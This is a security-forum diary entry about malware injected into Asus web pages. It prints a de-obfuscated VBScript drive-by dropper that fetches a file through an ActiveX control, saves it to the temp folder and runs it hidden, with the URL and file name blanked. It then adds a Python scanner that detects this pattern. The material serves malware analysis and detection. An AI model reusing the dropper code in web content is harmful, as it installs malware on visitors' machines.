
SANS ISC: Virus spreads from Asus Server SANS ISC InfoSec Forums

Virus spreads from Asus Server
Robert has shared with us a report indicating drive-by downloads injected into Asus pages:

This is definitely not the first such case. Insecure websites are a favourite resource for attackers, who use them as a platform to launch attacks.

Our handler Lenny has a de-obfuscated version of the VBScript that triggered the download:

 <script language="VBScript">
   on error resume next                 ' suppress every runtime error so a failure never alerts the user
   ' each sensitive string is split in two and joined at runtime to evade simple signature matching
   clID1  = "clsi"
   clID2  = "d:BD96C556-65A3-11D0-983A-00C04FC29E36"   ' CLSID of the RDS.DataSpace ActiveX control
   XML1 = "Mic"
   XML2 = "rosoft.XMLHTTP"             ' Microsoft.XMLHTTP fetches the payload
   AdoSqa1 = "Adodb.S"
   AdoSqa2 = "tream"                   ' Adodb.Stream writes the response bytes to disk
   oGet   = "GET"
   fname1 = ""                         ' payload file name, blanked in this de-obfuscated copy
   SFO    = "Scripting.FileSystemObject"
   SApp   = "Shell.Application"
   dl     = ""                         ' download URL, blanked in this de-obfuscated copy
   Set df = document.createElement("object")
   df.setAttribute "classid", clID1&clID2           ' instantiate RDS.DataSpace
   Set x  =  df.CreateObject(XML1&XML2,"")          ' RDS.DataSpace.CreateObject creates arbitrary COM objects from script
   set S  =  df.createobject(AdoSqa1&AdoSqa2,"")
   S.type = 1                                       ' adTypeBinary
   x.Open oGet, dl, False                           ' synchronous GET of the payload
   set F   = df.createobject(SFO,"")
   set tmp = F.GetSpecialFolder(2)                  ' 2 = TemporaryFolder
   fname1  = F.BuildPath(tmp,fname1)
   S.write x.responseBody
   S.savetofile fname1,2                            ' 2 = adSaveCreateOverWrite
   set Q  = df.createobject(SApp,"")
   Q.ShellExecute fname1,"","","open",0             ' launch the dropped file with a hidden window
 </script>
 <title>Internet Explorer</title>
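
The split-string trick above (two halves joined with `&` at runtime) is easy to undo mechanically. The following is an added example, not from the diary or its handlers: a small Python scanner that folds those concatenations back together and then checks the result for the combination of objects this script uses (the RDS.DataSpace CLSID, Microsoft.XMLHTTP, Adodb.Stream, Shell.Application plus ShellExecute). The sample script embedded in it is a constructed excerpt of the de-obfuscated code, and the scanner only handles the two-variable `a&b` pattern shown here.

```python
import re

# Constructed excerpt of the split-string script from the diary (file name and
# URL are left blank, as the handlers left them).
SAMPLE = '''<script language="VBScript">
  clID1  = "clsi"
  clID2  = "d:BD96C556-65A3-11D0-983A-00C04FC29E36"
  XML1 = "Mic"
  XML2 = "rosoft.XMLHTTP"
  AdoSqa1 = "Adodb.S"
  AdoSqa2 = "tream"
  SApp   = "Shell.Application"
  Set df = document.createElement("object")
  df.setAttribute "classid", clID1&clID2
  Set x  =  df.CreateObject(XML1&XML2,"")
  set S  =  df.createobject(AdoSqa1&AdoSqa2,"")
  set Q  = df.createobject(SApp,"")
  Q.ShellExecute fname1,"","","open",0
</script>'''

ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$', re.M)   # name = "literal"
CONCAT = re.compile(r'\b(\w+)\s*&\s*(\w+)\b')                 # name1&name2

# All four indicators plus ShellExecute form the download-and-run chain seen here.
INDICATORS = {
    "rds_dataspace": "bd96c556-65a3-11d0-983a-00c04fc29e36",  # CLSID from the page
    "xmlhttp": "microsoft.xmlhttp",
    "adodb_stream": "adodb.stream",
    "shell_app": "shell.application",
}

def resolve_strings(script):
    """Inline string-literal variables and fold a&b joins so the strings read
    as they would at execution time."""
    consts = dict(ASSIGN.findall(script))
    def fold(m):
        a, b = m.group(1), m.group(2)
        return '"%s%s"' % (consts[a], consts[b]) if a in consts and b in consts else m.group(0)
    out = CONCAT.sub(fold, script)
    for name, val in consts.items():   # remaining single uses, not the assignment itself
        out = re.sub(r'\b%s\b(?!\s*=)' % re.escape(name), '"%s"' % val, out)
    return out

def scan(script):
    """Return which indicators are present once the obfuscation is resolved."""
    text = resolve_strings(script).lower()
    hits = {k: v in text for k, v in INDICATORS.items()}
    hits["download_and_execute"] = all(hits.values()) and "shellexecute" in text
    return hits
```

Run `scan(SAMPLE)` against the embedded excerpt to see every indicator light up; a script that only uses one of these objects is reported but not flagged as a full chain.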

Koon Yaw

Dec 16th 2006
